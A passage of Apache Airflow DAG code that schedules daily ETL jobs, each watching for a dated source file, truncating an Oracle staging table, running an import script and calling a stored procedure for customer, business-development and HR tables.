task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Premium_Freight"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Premium_Freight_LD"
ODS_UC_Premium_Freight_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Premium_Freight"
)
# JOB_TYPE=SQL
my_taskid = "UC_Premium_Freight"
UC_Premium_Freight = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_RFQ_Freight_Estimate_MAP_WH"
ODS_UC_RFQ_Freight_Estimate_MAP_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_RFQ_Freight_Estimate_MAP_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_RFQ_Freight_Estimate_MAP_STG"
UC_RFQ_Freight_Estimate_MAP_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_RFQ_Freight_Estimate_MAP"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_RFQ_Freight_Estimate_MAP_LD"
ODS_UC_RFQ_Freight_Estimate_MAP_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_RFQ_Freight_Estimate_MAP"
)
# JOB_TYPE=SQL
my_taskid = "UC_RFQ_Freight_Estimate_MAP"
UC_RFQ_Freight_Estimate_MAP = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_RFQ_Critical_Parts_MAP_WH"
ODS_UC_RFQ_Critical_Parts_MAP_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_RFQ_Critical_Parts_MAP_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_RFQ_Critical_Parts_MAP_STG"
UC_RFQ_Critical_Parts_MAP_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_RFQ_Critical_Parts_MAP"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_RFQ_Critical_Parts_MAP_LD"
ODS_UC_RFQ_Critical_Parts_MAP_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_RFQ_Critical_Parts_MAP"
)
# JOB_TYPE=SQL
my_taskid = "UC_RFQ_Critical_Parts_MAP"
UC_RFQ_Critical_Parts_MAP = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_RFQ_Key_parts_MAP_WH"
ODS_UC_RFQ_Key_parts_MAP_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_RFQ_Key_parts_MAP_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_RFQ_Key_parts_MAP_STG"
UC_RFQ_Key_parts_MAP_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_RFQ_Key_parts_MAP"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_RFQ_Key_parts_MAP_LD"
ODS_UC_RFQ_Key_parts_MAP_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_RFQ_Key_parts_MAP"
)
# JOB_TYPE=SQL
my_taskid = "UC_RFQ_Key_parts_MAP"
UC_RFQ_Key_parts_MAP = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Company_and_Background_Check_WH"
ODS_UC_Company_and_Background_Check_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Company_and_Background_Check_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Company_and_Background_Check_STG"
UC_Company_and_Background_Check_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Company_and_Background_Check"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Company_and_Background_Check_LD"
ODS_UC_Company_and_Background_Check_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Company_and_Background_Check"
)
# JOB_TYPE=SQL
my_taskid = "UC_Company_and_Background_Check"
UC_Company_and_Background_Check = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Customer_PO_Management_WH"
ODS_UC_Customer_PO_Management_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Customer_PO_Management_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Customer_PO_Management_STG"
UC_Customer_PO_Management_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Customer_PO_Management"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Customer_PO_Management_LD"
ODS_UC_Customer_PO_Management_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Customer_PO_Management"
)
# JOB_TYPE=SQL
my_taskid = "UC_Customer_PO_Management"
UC_Customer_PO_Management = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_NC_Customer_Rebate_PN_WH"
ODS_UC_NC_Customer_Rebate_PN_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_NC_Customer_Rebate_PN_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_NC_Customer_Rebate_PN_STG"
UC_NC_Customer_Rebate_PN_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_NC_Customer_Rebate_PN"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_NC_Customer_Rebate_PN_LD"
ODS_UC_NC_Customer_Rebate_PN_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_NC_Customer_Rebate_PN"
)
# JOB_TYPE=SQL
my_taskid = "UC_NC_Customer_Rebate_PN"
UC_NC_Customer_Rebate_PN = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Risk_Shipment_Weekly_WH"
ODS_UC_Risk_Shipment_Weekly_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Risk_Shipment_Weekly_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Risk_Shipment_Weekly_STG"
UC_Risk_Shipment_Weekly_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Risk_Shipment_Weekly"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Risk_Shipment_Weekly_LD"
ODS_UC_Risk_Shipment_Weekly_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Risk_Shipment_Weekly"
)
# JOB_TYPE=SQL
my_taskid = "UC_Risk_Shipment_Weekly"
UC_Risk_Shipment_Weekly = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_NC_ROYALTY_REPORT_WH"
ODS_UC_NC_ROYALTY_REPORT_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_NC_ROYALTY_REPORT_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_NC_ROYALTY_REPORT_STG"
UC_NC_ROYALTY_REPORT_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_NC_ROYALTY_REPORT"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_NC_ROYALTY_REPORT_LD"
ODS_UC_NC_ROYALTY_REPORT_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_NC_ROYALTY_REPORT"
)
# JOB_TYPE=SQL
my_taskid = "UC_NC_ROYALTY_REPORT"
UC_NC_ROYALTY_REPORT = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=SQL
my_taskid = "UG_PIPELINE_PROJECT_CONVERSION"
UG_PIPELINE_PROJECT_CONVERSION = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_GBD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UG_PIPELINE_PROJECT_CONVERSION_WH"
ODS_UG_PIPELINE_PROJECT_CONVERSION_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_GBD,
filepath= "{{ var.value.DIR_SOURCE }}UPD/GBD/UG_PIPELINE_PROJECT_CONVERSION_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UG_PIPELINE_PROJECT_CONVERSION_STG"
UG_PIPELINE_PROJECT_CONVERSION_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_GBD,
sql= "TRUNCATE TABLE STAGE.UG_PIPELINE_PROJECT_CONVERSION"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UG_PIPELINE_PROJECT_CONVERSION_LD"
ODS_UG_PIPELINE_PROJECT_CONVERSION_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_GBD,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD GBD UG_PIPELINE_PROJECT_CONVERSION"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_SENIORITY_WH"
ODS_UH_SENIORITY_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_SENIORITY_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_SENIORITY_STG"
UH_SENIORITY_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_SENIORITY"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_SENIORITY_LD"
ODS_UH_SENIORITY_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_SENIORITY"
)
# JOB_TYPE=SQL
my_taskid = "UH_SENIORITY"
UH_SENIORITY = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_HEADCOUNT_BUDGET_WH"
ODS_UH_HEADCOUNT_BUDGET_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_HEADCOUNT_BUDGET_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_HEADCOUNT_BUDGET_STG"
UH_HEADCOUNT_BUDGET_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_HEADCOUNT_BUDGET"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_HEADCOUNT_BUDGET_LD"
ODS_UH_HEADCOUNT_BUDGET_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_HEADCOUNT_BUDGET"
)
# JOB_TYPE=SQL
my_taskid = "UH_HEADCOUNT_BUDGET"
UH_HEADCOUNT_BUDGET = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_RDEXPENSE_WH"
ODS_UH_RDEXPENSE_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_RDEXPENSE_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_RDEXPENSE_STG"
UH_RDEXPENSE_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_RDEXPENSE"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_RDEXPENSE_LD"
ODS_UH_RDEXPENSE_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_RDEXPENSE"
)
# JOB_TYPE=SQL
my_taskid = "UH_RDEXPENSE"
UH_RDEXPENSE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_WORKPLACE_MAPPING_WH"
ODS_UH_WORKPLACE_MAPPING_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_WORKPLACE_MAPPING_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_WORKPLACE_MAPPING_STG"
UH_WORKPLACE_MAPPING_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_WORKPLACE_MAPPING"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_WORKPLACE_MAPPING_LD"
ODS_UH_WORKPLACE_MAPPING_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_WORKPLACE_MAPPING"
)
# JOB_TYPE=SQL
my_taskid = "UH_WORKPLACE_MAPPING"
UH_WORKPLACE_MAPPING = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_WORKLOCATION_WH"
ODS_UH_WORKLOCATION_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_WORKLOCATION_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_WORKLOCATION_STG"
UH_WORKLOCATION_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_WORKLOCATION"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_WORKLOCATION_LD"
ODS_UH_WORKLOCATION_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_WORKLOCATION"
)
# JOB_TYPE=SQL
my_taskid = "UH_WORKLOCATION"
UH_WORKLOCATION = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_WORKLOCATION_MAPPING_WH"
ODS_UH_WORKLOCATION_MAPPING_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_WORKLOCATION_MAPPING_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_WORKLOCATION_MAPPING_STG"
UH_WORKLOCATION_MAPPING_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_WORKLOCATION_MAPPING"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_WORKLOCATION_MAPPING_LD"
ODS_UH_WORKLOCATION_MAPPING_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_WORKLOCATION_MAPPING"
)
# JOB_TYPE=SQL
my_taskid = "UH_WORKLOCATION_MAPPING"
UH_WORKLOCATION_MAPPING = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_DEPTABBRE_BU_MAPPING_WH"
ODS_UH_DEPTABBRE_BU_MAPPING_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_DEPTABBRE_BU_MAPPING_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_DEPTABBRE_BU_MAPPING_STG"
UH_DEPTABBRE_BU_MAPPING_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_DEPTABBRE_BU_MAPPING"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_DEPTABBRE_BU_MAPPING_LD"
ODS_UH_DEPTABBRE_BU_MAPPING_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_DEPTABBRE_BU_MAPPING"
)
# JOB_TYPE=SQL
my_taskid = "UH_DEPTABBRE_BU_MAPPING"
UH_DEPTABBRE_BU_MAPPING = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_DEPTABBRE_WH"
ODS_UH_DEPTABBRE_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_DEPTABBRE_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_DEPTABBRE_STG"
UH_DEPTABBRE_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_DEPTABBRE"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_DEPTABBRE_LD"
ODS_UH_DEPTABBRE_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_DEPTABBRE"
)
# JOB_TYPE=SQL
my_taskid = "UH_DEPTABBRE"
UH_DEPTABBRE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_DEPTUNIT_MAPPING_WH"
ODS_UH_DEPTUNIT_MAPPING_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_DEPTUNIT_MAPPING_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_DEPTUNIT_MAPPING_STG"
UH_DEPTUNIT_MAPPING_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_DEPTUNIT_MAPPING"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_DEPTUNIT_MAPPING_LD"
ODS_UH_DEPTUNIT_MAPPING_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_DEPTUNIT_MAPPING"
)
# JOB_TYPE=SQL
my_taskid = "UH_DEPTUNIT_MAPPING"
UH_DEPTUNIT_MAPPING = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_PERSONNEL_CATEGORY_WH"
ODS_UH_PERSONNEL_CATEGORY_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_PERSONNEL_CATEGORY_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_PERSONNEL_CATEGORY_STG"
UH_PERSONNEL_CATEGORY_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_PERSONNEL_CATEGORY"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_PERSONNEL_CATEGORY_LD"
ODS_UH_PERSONNEL_CATEGORY_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_PERSONNEL_CATEGORY"
)
# JOB_TYPE=SQL
my_taskid = "UH_PERSONNEL_CATEGORY"
UH_PERSONNEL_CATEGORY = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_PERSONNEL_CATEGORY_MAPPING_WH"
ODS_UH_PERSONNEL_CATEGORY_MAPPING_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_PERSONNEL_CATEGORY_MAPPING_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_PERSONNEL_CATEGORY_MAPPING_STG"
UH_PERSONNEL_CATEGORY_MAPPING_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_PERSONNEL_CATEGORY_MAPPING"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_PERSONNEL_CATEGORY_MAPPING_LD"
ODS_UH_PERSONNEL_CATEGORY_MAPPING_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
